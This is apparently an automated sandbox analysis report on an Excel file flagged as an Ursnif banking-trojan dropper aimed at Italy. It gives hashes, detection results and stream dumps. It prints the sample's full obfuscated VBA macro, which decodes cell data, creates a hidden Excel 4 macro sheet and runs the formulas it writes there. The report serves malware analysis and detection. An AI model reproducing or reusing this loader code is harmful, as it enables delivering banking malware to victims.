Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report aaaaaaaaaaa.xls

Overview

General Information

Sample Name:aaaaaaaaaaa.xls
Analysis ID:509333
MD5:a8ca4b1a0ab594b286145586e6b4921c
SHA1:2e8c2f19a0a58755d03bcf12a38e9383d49a8465
SHA256:9cb3b49716b637ee57db8cc7bd17189ac2fa2489d8ba32a94a7c99f20fa82a5e
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Ursnif Dropper
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: aaaaaaaaaaa.xlsVirustotal: Detection: 13%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

E-Banking Fraud:

barindex
Detected Italy targeted Ursnif dropper documentShow sources
Source: Initial sampleOLE, VBA macro line: Ursnif specific tokens

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: aaaaaaaaaaa.xlsOLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
Source: aaaaaaaaaaa.xlsOLE, VBA macro line: ActiveSheet.Visible = 0
Source: aaaaaaaaaaa.xlsOLE indicator, VBA macros: true
Source: aaaaaaaaaaa.xlsVirustotal: Detection: 13%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB70.tmpJump to behavior
Source: aaaaaaaaaaa.xlsOLE indicator, Workbook stream: true
Source: classification engineClassification label: mal60.bank.expl.winXLS@1/0@0/0
Source: aaaaaaaaaaa.xlsJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionScripting11OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
aaaaaaaaaaa.xls14%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:509333
Start date:26.10.2021
Start time:12:19:09
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 14s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:aaaaaaaaaaa.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.bank.expl.winXLS@1/0@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active AutoShape Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Tue Oct 26 08:18:26 2021, Last Saved Time/Date: Tue Oct 26 08:18:28 2021, Security: 0
Entropy (8bit):5.783981035047647
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:aaaaaaaaaaa.xls
File size:56320
MD5:a8ca4b1a0ab594b286145586e6b4921c
SHA1:2e8c2f19a0a58755d03bcf12a38e9383d49a8465
SHA256:9cb3b49716b637ee57db8cc7bd17189ac2fa2489d8ba32a94a7c99f20fa82a5e
SHA512:42cf117b13e4e972f5565016f92bed73d915dccccb8f7e929ce6850c47dd4befe4dcd8723d6b124fd8f82c5f7da631b54fa4f820b56223b8e41397a73650c6cd
SSDEEP:1536:FsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0205bQK/6wP6mMCWtmKl:FhlYkEIuPm3fNRZmbaoFhZhR0cixIHmp
File Content Preview:........................>...................................F..................................................................................................................................................................................................

File Icon

Icon Hash:e4eea286a4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "aaaaaaaaaaa.xls"

Indicators

Has Summary Info:True
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1252
Author:
Last Saved By:
Create Time:2021-10-26 07:18:26.189000
Last Saved Time:2021-10-26 07:18:28
Security:0

Document Summary

Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams with VBA

VBA File Name: Foglio1, Stream Size: 992
General
Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:Foglio1
Stream Size:992
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 db f6 f5 9d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5921
General
Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:Questa_cartella_di_lavoro
Stream Size:5921
Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . I . L q . . I . . - . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . s . . O Q L . \\ b T ? . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . s . . O Q L . \\ b T ? . . P . I . L q . . I . . - . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 03 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 de 12 00 00 00 00 00 00 01 00 00 00 db f6 f5 c7 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 8d 49 cc 4c 71 f6 8d 49 b5 aa 2d f9 e8 a6 e7 cb 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Function Mali_i(R As String, s As Long) As Variant
Dim E As Long, F As Long
Dim L() As String
ReDim L(0 To CLng((Aii(R) / s) - 1))
For E = 1 To Aii(R) Step s
L(F) = Mid(R, E, s): F = F + 1
Next
Mali_i = L
End Function
Function versione(un As String, u As Integer)
u = R: Sheets(1).[F4].FormulaLocal = un
End Function
Function nostri()
nostri = Lmeet & "R" & "I"
End Function
Function Utilizziamo()
uk = 7: Sheets(4 - 3).Cells(28, 6).FormulaLocal = nostri & Questo
End Function
Sub documento_ingrandisci()
fg = 3
Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
O = migliorare
For Each oo In per_u
fg = 1: fg = 5: vG = (versione(Lmeet & oo, 1 + fg)): fg = 112: OOi ((fg))
Next
End Sub
Function Aii(ii As String)
m = j: m = ii
Aii = Len(m)
End Function
Function inglese() As String
inglese = Ecco_la & "RN"
End Function
Sub l_esperienza()
ActiveSheet.Visible = 0
End Sub
Sub OOi(E As Long)
i = E: Run ("" & "F" & 3)
End Sub
Function per_u() As Variant
H = 45
For Each G In Mali_i(Cells(148, 8), 3)
If Not (IsNumeric(G)) Then gb = LTrim(Left(G, Aii("" & G) - 1)) Else gb = LTrim(G)
j = j & Chr(gb)
Next
per_u = Split(j, "" & "z")
End Function
Function migliorare()
migliorare = Utilizziamo
End Function
Function Ecco_la() As String
Ecco_la = "O"
End Function
Function Lmeet()
Lmeet = Ecco_la: Lmeet = "="
End Function
Function Questo()
Questo = "T" & inglese & "O" & "()"
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118
General
Stream Path:\x1CompObj
File Type:data
Stream Size:118
Entropy:4.32915524493
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 252
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:252
Entropy:2.83667470018
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 6 _ 1 0 _ 2 0 2 1 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 cc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a3 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:176
Entropy:2.72141841744
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . 9 . . . @ . . . . : . . 9 . . . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 34137
General
Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16
Stream Size:34137
Entropy:6.72378712541
Base64 Encoded:True
Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 461
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:461
Entropy:5.42969292893
Base64 Encoded:True
Data ASCII:I D = " { 6 A C 0 6 E B A - 0 7 B 1 - 4 2 9 C - 8 2 F 5 - D E D 7 F B 1 B 6 7 9 C } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 C 9 2 6 4 B F F 4 F F F 4 F F F 4 F F F 4 F " . . D P B = " A A A 8 B 6 1 1 8 A 1 2 8 A 1 2 8 A " . . G C = "
Data Raw:49 44 3d 22 7b 36 41 43 30 36 45 42 41 2d 30 37 42 31 2d 34 32 39 43 2d 38 32 46 35 2d 44 45 44 37 46 42 31 42 36 37 39 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
File Type:data
Stream Size:104
Entropy:3.33133492199
Base64 Encoded:False
Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2986
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:data
Stream Size:2986
Entropy:4.41876656199
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2045
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:data
Stream Size:2045
Entropy:3.39613735946
Base64 Encoded:False
Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . = . . G . D . . f & . s _ - . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 286
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:data
Stream Size:286
Entropy:1.82389983631
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . u n . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . i i . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1677
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:data
Stream Size:1677
Entropy:2.23786009811
Base64 Encoded:False
Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:data
Stream Size:1000
Entropy:2.49976580289
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . H . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . P .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 58 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 0c 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 561
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
File Type:data
Stream Size:561
Entropy:6.25655226973
Base64 Encoded:True
Data ASCII:. - . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . n c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:01 2d b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 e4 dd a0 6e 63 07 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: EXCEL.EXE PID: 2016 Parent PID: 596

General

Start time:12:19:16
Start date:26/10/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f140000
File size:28253536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
